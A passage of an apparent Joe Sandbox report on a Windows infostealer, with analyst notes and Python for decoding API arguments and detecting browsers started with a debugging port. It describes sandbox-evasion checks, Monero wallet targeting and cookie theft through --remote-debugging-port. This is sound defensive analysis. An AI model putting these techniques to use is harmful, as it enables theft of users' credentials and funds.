                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F58F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F5AA7
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007F5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F5478
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F5568
                                    • Part of subcall function 007F5510: lstrlen.KERNEL32(00000000), ref: 007F557F
                                    • Part of subcall function 007F5510: StrStrA.SHLWAPI(00000000,00000000), ref: 007F55B4
                                    • Part of subcall function 007F5510: lstrlen.KERNEL32(00000000), ref: 007F55D3
                                    • Part of subcall function 007F5510: lstrlen.KERNEL32(00000000), ref: 007F55FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F59DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F5B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F5C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 007F5C6B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: 5c857eb9ebc0771491b41df089602047dab9e0ea4350ae6cf203558ef1ae4b39
                                  • Instruction ID: f32268f392acfa05c8d01dfd72f0d99b52447a31916fe8fd02bb2384cdfffe3f
                                  • Opcode Fuzzy Hash: 5c857eb9ebc0771491b41df089602047dab9e0ea4350ae6cf203558ef1ae4b39
                                  • Instruction Fuzzy Hash: 1DE134B191010CEACB14FBA4DDAB9FD773DAF54340F408558B61A56292EF3C6A18CB52

                                  Control-flow Graph

                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 007F1A15
                                  • ExitProcess.KERNEL32 ref: 007F1A21
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: f22d8766322be67c3163fed1ee42e653a49a39e92819182b6021150dc9326166
                                  • Instruction ID: dcec34335ab4a2e7aaeec226c407e3d92c96ab35b3f6f96f12dbc8c5ad8ff40b
                                  • Opcode Fuzzy Hash: f22d8766322be67c3163fed1ee42e653a49a39e92819182b6021150dc9326166
                                  • Instruction Fuzzy Hash: 0E513BB4A0420DEBCB04DFE4D954ABE77B9EF44304F508148E916AB391E7B8E941DB62

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450720), ref: 007F9BF1
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,014507E0), ref: 007F9C0A
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,014507C8), ref: 007F9C22
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450798), ref: 007F9C3A
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450828), ref: 007F9C53
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01458940), ref: 007F9C6B
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,014464E0), ref: 007F9C83
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01446460), ref: 007F9C9C
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450840), ref: 007F9CB4
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450558), ref: 007F9CCC
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450570), ref: 007F9CE5
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450588), ref: 007F9CFD
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,014463C0), ref: 007F9D15
                                    • Part of subcall function 007F9BB0: GetProcAddress.KERNEL32(75900000,01450600), ref: 007F9D2E
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007E11D0: ExitProcess.KERNEL32 ref: 007E1211
                                    • Part of subcall function 007E1160: GetSystemInfo.KERNEL32(?), ref: 007E116A
                                    • Part of subcall function 007E1160: ExitProcess.KERNEL32 ref: 007E117E
                                    • Part of subcall function 007E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007E112B
                                    • Part of subcall function 007E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 007E1132
                                    • Part of subcall function 007E1110: ExitProcess.KERNEL32 ref: 007E1143
                                    • Part of subcall function 007E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E123E
                                    • Part of subcall function 007E1220: __aulldiv.LIBCMT ref: 007E1258
                                    • Part of subcall function 007E1220: __aulldiv.LIBCMT ref: 007E1266
                                    • Part of subcall function 007E1220: ExitProcess.KERNEL32 ref: 007E1294
                                    • Part of subcall function 007F6A10: GetUserDefaultLangID.KERNEL32 ref: 007F6A14
                                    • Part of subcall function 007E1190: ExitProcess.KERNEL32 ref: 007E11C6
                                    • Part of subcall function 007F79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E11B7), ref: 007F7A10
                                    • Part of subcall function 007F79E0: RtlAllocateHeap.NTDLL(00000000), ref: 007F7A17
                                    • Part of subcall function 007F79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F7A2F
                                    • Part of subcall function 007F7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7AA0
                                    • Part of subcall function 007F7A70: RtlAllocateHeap.NTDLL(00000000), ref: 007F7AA7
                                    • Part of subcall function 007F7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007F7ABF
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01458960,?,008010F4,?,00000000,?,008010F8,?,00000000,00800AF3), ref: 007F6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 007F6D99
                                  • Sleep.KERNEL32(00001770), ref: 007F6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01458960,?,008010F4,?,00000000,?,008010F8,?,00000000,00800AF3), ref: 007F6DBA
                                  • ExitProcess.KERNEL32 ref: 007F6DC2
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 8b78bb5aaec22b9dbf3fe88f6f06ceffc2b82eab73cb5f97eec911ca819bf9da
                                  • Instruction ID: 25c83f150daaef4228f40e74d08142720c332c970ebae297edc8a47ccb375874
                                  • Opcode Fuzzy Hash: 8b78bb5aaec22b9dbf3fe88f6f06ceffc2b82eab73cb5f97eec911ca819bf9da
                                  • Instruction Fuzzy Hash: 4C31DCB1A0410CEBCB04F7F0DC5BABE7779AF54340F504658F216A6292DF786905C662

                                  Control-flow Graph

                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 007E123E
                                  • __aulldiv.LIBCMT ref: 007E1258
                                  • __aulldiv.LIBCMT ref: 007E1266
                                  • ExitProcess.KERNEL32 ref: 007E1294
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 79dbca01198334dbe7bf2fe6308504a16dc8b44b47b90d63cae71e687e1175ef
                                  • Instruction ID: 5cbe540e9148f8105f2386664be101bbe1040e25f8423359534334b6432e2027
                                  • Opcode Fuzzy Hash: 79dbca01198334dbe7bf2fe6308504a16dc8b44b47b90d63cae71e687e1175ef
                                  • Instruction Fuzzy Hash: A501ADB0E40308FAEF10DFE4CC4ABAEBB7CBB08701F608048E704BA2C1D6B859419759

                                  Control-flow Graph

                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01458960,?,008010F4,?,00000000,?,008010F8,?,00000000,00800AF3), ref: 007F6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 007F6D99
                                  • Sleep.KERNEL32(00001770), ref: 007F6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01458960,?,008010F4,?,00000000,?,008010F8,?,00000000,00800AF3), ref: 007F6DBA
                                  • ExitProcess.KERNEL32 ref: 007F6DC2
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: b529c1368b93f18b46cca2b6f7dc40b4fa6814eb8c740dac8d0ad37ac84f0b28
                                  • Instruction ID: 32922ad51418f1a8b1025fe794bb8012b8f5923559f5d669041df33d21fee145
                                  • Opcode Fuzzy Hash: b529c1368b93f18b46cca2b6f7dc40b4fa6814eb8c740dac8d0ad37ac84f0b28
                                  • Instruction Fuzzy Hash: 30F05E70B4820DEBEF04EBE0DC4ABBD3774AF14741F100615B712A53A6CBF89501CA62

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 8ece92597587a347442d0e885c6fcca12452287c835663671880c7d08a0cb987
                                  • Instruction ID: 9916a61c09292498e2514463bfb55cf0a0db8d97b0d0a6b5efbf182386078979
                                  • Opcode Fuzzy Hash: 8ece92597587a347442d0e885c6fcca12452287c835663671880c7d08a0cb987
                                  • Instruction Fuzzy Hash: 742142B1D00209ABDF14DFA5EC4AADD7B75FB44320F108625F515A72D1DB706609CF91

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E62D0: InternetOpenA.WININET(00800DFF,00000001,00000000,00000000,00000000), ref: 007E6331
                                    • Part of subcall function 007E62D0: StrCmpCA.SHLWAPI(?,0145E350), ref: 007E6353
                                    • Part of subcall function 007E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E6385
                                    • Part of subcall function 007E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E63D5
                                    • Part of subcall function 007E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E640F
                                    • Part of subcall function 007E62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007F5478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 56a4def052a26ee2c04c01ad1a1d5d9aebce19ece198447591083242c0f0458e
                                  • Instruction ID: 55ffd09047a71ce3dc5e00528248dca360889e1da28f5e6cbe3c8f045dd19b40
                                  • Opcode Fuzzy Hash: 56a4def052a26ee2c04c01ad1a1d5d9aebce19ece198447591083242c0f0458e
                                  • Instruction Fuzzy Hash: 8011EFB0A0014CEACB14FFA4DD9AAFD7329AF54350F404558FA1E57692EB38AB18C651
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 007F7ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 1d4af46ae375f289e994e2f3acac4e361c039923d217851a926dfdc7a481a1a0
                                  • Instruction ID: 678072b09e49ce7e0d659cb67f8356bec2df3a5a11ed8eb4826f4e7cfc000b56
                                  • Opcode Fuzzy Hash: 1d4af46ae375f289e994e2f3acac4e361c039923d217851a926dfdc7a481a1a0
                                  • Instruction Fuzzy Hash: 6D0162B1A08249ABC714CF98DD45BAEBBB8F744711F10021AF615E2390D7B45A00CBA1
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007E112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 007E1132
                                  • ExitProcess.KERNEL32 ref: 007E1143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 10e0a211970cf82bd05078b5ed0134717af5a89705476f2d21ea83d5905e158f
                                  • Instruction ID: b2f2cb8350e43d36cdb70862f3867d771e53fc112da0a735e895437edaa06836
                                  • Opcode Fuzzy Hash: 10e0a211970cf82bd05078b5ed0134717af5a89705476f2d21ea83d5905e158f
                                  • Instruction Fuzzy Hash: 43E0CD7094930CFBE710DBD1DC0FB4C767C9B44B01F500254F7097A1E1C6F426404658
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007E10B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007E10F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: bd2d46efd3713d5fdf32a9784664ab2574d75b63317d5c8fe83171825a7c6d0d
                                  • Instruction ID: 03e1e17810f368b08f11f138aadf5bdf718bfe09fbcd407494f993dc42d39aef
                                  • Opcode Fuzzy Hash: bd2d46efd3713d5fdf32a9784664ab2574d75b63317d5c8fe83171825a7c6d0d
                                  • Instruction Fuzzy Hash: D1F0E2B1642208BBE7149AA8AC5AFAEB79CE709B04F300548F500E3291D5719E00CAA0
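The API listings in these entries record Win32 arguments as raw 8-digit hex: 17C841C0 and 00003000 on the VirtualAlloc line, 00008000 on VirtualFree, 00000003 on InternetConnectA, 00400100 on HttpOpenRequestA and 0000001F on InternetSetOptionA. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that parses lines in this listing format and names those constants so a reviewer does not have to look them up by hand: MEM_* allocation types, PAGE_* protections, the WinINet open type, service, request flags and option number. The sample listing embedded in the code is copied from the entries on this page; argument positions follow the documented Win32 prototypes, and the 256 MiB threshold used to flag oversized commits is an assumption chosen for the example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One "APIs" line of a Joe Sandbox function listing, in the three shapes seen on this page:
#   • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007E10B3
#   • Part of subcall function 007E62D0: InternetOpenA.WININET(00800DFF,...), ref: 007E6331
#   • wsprintfA.USER32 ref: 007F3B1C            (no argument list recorded)
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Win32 constants for the argument positions decoded below.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
INET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
              0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
INET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}

def bitflags(value: int, table: dict[int, str]) -> list[str]:
    """Name the known bits of a mask; an unknown remainder is kept as hex so nothing is silently dropped."""
    known = [bit for bit in table if value & bit]
    names = [table[bit] for bit in known]
    rest = value & ~sum(known)
    if rest:
        names.append(hex(rest))
    return names

def as_int(arg: str) -> int | None:
    """Arguments are 8-digit hex; '?' (unknown) and literals such as GET are left undecoded."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None

# (API name, zero-based argument index) -> (label, decoder), positions per the Win32 prototypes.
DECODERS = {
    ("VirtualAlloc", 1): ("size_bytes", lambda v: v),
    ("VirtualAlloc", 2): ("alloc_type", lambda v: bitflags(v, MEM_FLAGS)),
    ("VirtualAlloc", 3): ("protect", lambda v: bitflags(v, PAGE_PROTECT)),
    ("VirtualFree", 2): ("free_type", lambda v: bitflags(v, MEM_FLAGS)),
    ("InternetOpenA", 1): ("access_type", lambda v: INET_OPEN_TYPE.get(v, hex(v))),
    ("InternetConnectA", 5): ("service", lambda v: INET_SERVICE.get(v, hex(v))),
    ("HttpOpenRequestA", 6): ("flags", lambda v: bitflags(v, INET_FLAGS)),
    ("InternetSetOptionA", 1): ("option", lambda v: INET_OPTION.get(v, str(v))),
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                        # address of the call site
    subcall_of: str | None = None   # function address when the line is "Part of subcall function"
    decoded: dict = field(default_factory=dict)

def parse_api_line(line: str) -> ApiCall | None:
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    call = ApiCall(m["api"], m["module"], args, m["ref"], m["sub"])
    # The listing may show extra stack values after the real arguments (VirtualFree shows five);
    # only the positions named in DECODERS are interpreted.
    for idx, arg in enumerate(args):
        spec, value = DECODERS.get((call.api, idx)), as_int(arg)
        if spec and value is not None:
            label, decode = spec
            call.decoded[label] = decode(value)
    return call

def parse_listing(text: str) -> list[ApiCall]:
    return [c for c in (parse_api_line(line) for line in text.splitlines()) if c]

def large_commits(calls: list[ApiCall], threshold_bytes: int = 256 * 2**20) -> list[ApiCall]:
    """VirtualAlloc commits at or above the threshold (assumed 256 MiB). Probes of this size are a
    common way to test that the host has as much memory as a real workstation before continuing."""
    return [c for c in calls
            if c.api == "VirtualAlloc"
            and "MEM_COMMIT" in c.decoded.get("alloc_type", [])
            and c.decoded.get("size_bytes", 0) >= threshold_bytes]

# Lines copied from the function entries on this page.
SAMPLE_LISTING = """
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007E10B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007E10F7
• Part of subcall function 007E62D0: InternetOpenA.WININET(00800DFF,00000001,00000000,00000000,00000000), ref: 007E6331
• Part of subcall function 007E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E6385
• Part of subcall function 007E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E63D5
• Part of subcall function 007E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E640F
• wsprintfA.USER32 ref: 007F3B1C
"""

if __name__ == "__main__":
    for call in parse_listing(SAMPLE_LISTING):
        print(f"{call.ref} {call.api:<20} {call.decoded}")
```

Run stand-alone, the VirtualAlloc line decodes to a 399,000,000-byte MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE region that is released immediately afterwards, and the WinINet chain decodes to a direct (non-proxied) HTTP connection with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE and INTERNET_OPTION_SECURITY_FLAGS set on the request handle. Values the listing shows as ? stay undecoded rather than being guessed.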
                                  APIs
                                    • Part of subcall function 007F7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7AA0
                                    • Part of subcall function 007F7A70: RtlAllocateHeap.NTDLL(00000000), ref: 007F7AA7
                                    • Part of subcall function 007F7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 007F7ABF
                                    • Part of subcall function 007F79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E11B7), ref: 007F7A10
                                    • Part of subcall function 007F79E0: RtlAllocateHeap.NTDLL(00000000), ref: 007F7A17
                                    • Part of subcall function 007F79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F7A2F
                                  • ExitProcess.KERNEL32 ref: 007E11C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: d14d2f2e6616e93fc05f83c22e78d9ce62e922ce13605127ceff64df2bfd2b7f
                                  • Instruction ID: 64e1940aa71f55728aa9f1d589969cc65e5649574623c7da5ee2e2ffdb893114
                                  • Opcode Fuzzy Hash: d14d2f2e6616e93fc05f83c22e78d9ce62e922ce13605127ceff64df2bfd2b7f
                                  • Instruction Fuzzy Hash: A7E0ECB590820992CA14B3F57C0BB3A328C5B5530AF440514FA0496263EA7DE8128176
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00800B32,00800B2F,00000000,?,?,?,00801450,00800B2E), ref: 007EBEC5
                                  • StrCmpCA.SHLWAPI(?,00801454), ref: 007EBF33
                                  • StrCmpCA.SHLWAPI(?,00801458), ref: 007EBF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007EC8A9
                                  • FindClose.KERNEL32(000000FF), ref: 007EC8BB
                                  Strings
                                  • Preferences, xrefs: 007EC104
                                  • \Brave\Preferences, xrefs: 007EC1C1
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 007EC534
                                  • Google Chrome, xrefs: 007EC6F8
                                  • Brave, xrefs: 007EC0E8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 007EC495
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 007EC3B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: 1d37261ae0c7f2951b8b26d9fc78c35d4d8119603ce10f485d3ad6ef623c132f
                                  • Instruction ID: f5d0a5ec570f5d9ff844aa03329c9ab357e60f64b2a3355cd41ed41f0d79aaf7
                                  • Opcode Fuzzy Hash: 1d37261ae0c7f2951b8b26d9fc78c35d4d8119603ce10f485d3ad6ef623c132f
                                  • Instruction Fuzzy Hash: EE5202B2610148EBCB14FB64DD9AEFE733DAF54300F404598B60AA6191EE385B49CF66
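The strings in this entry (--remote-debugging-port=9229 --profile-directory=", Google Chrome, Brave, \Brave\Preferences) show a Chromium-based browser being started with its DevTools remote-debugging port enabled for a chosen profile. That port exposes the DevTools protocol on localhost, through which a local client can read the profile's cookies and other session data without decrypting the on-disk databases. On an endpoint this leaves a process-creation event: a browser whose command line carries --remote-debugging-port and whose parent is not the usual launcher. The Python below is an added detection example, not code from the report or from the sample. It scans process-creation records using Sysmon Event ID 1 field names (Image, CommandLine, ParentImage, ProcessId); the events, browser list, expected-parent list and file paths in it are constructed for the example, and only port 9229 is taken from the strings above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Chromium-based browsers that honour --remote-debugging-port (constructed list; extend for your fleet).
CHROMIUM_BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe"}
# Processes from which an interactive user normally starts a browser (assumption for the example).
EXPECTED_PARENTS = {"explorer.exe"}

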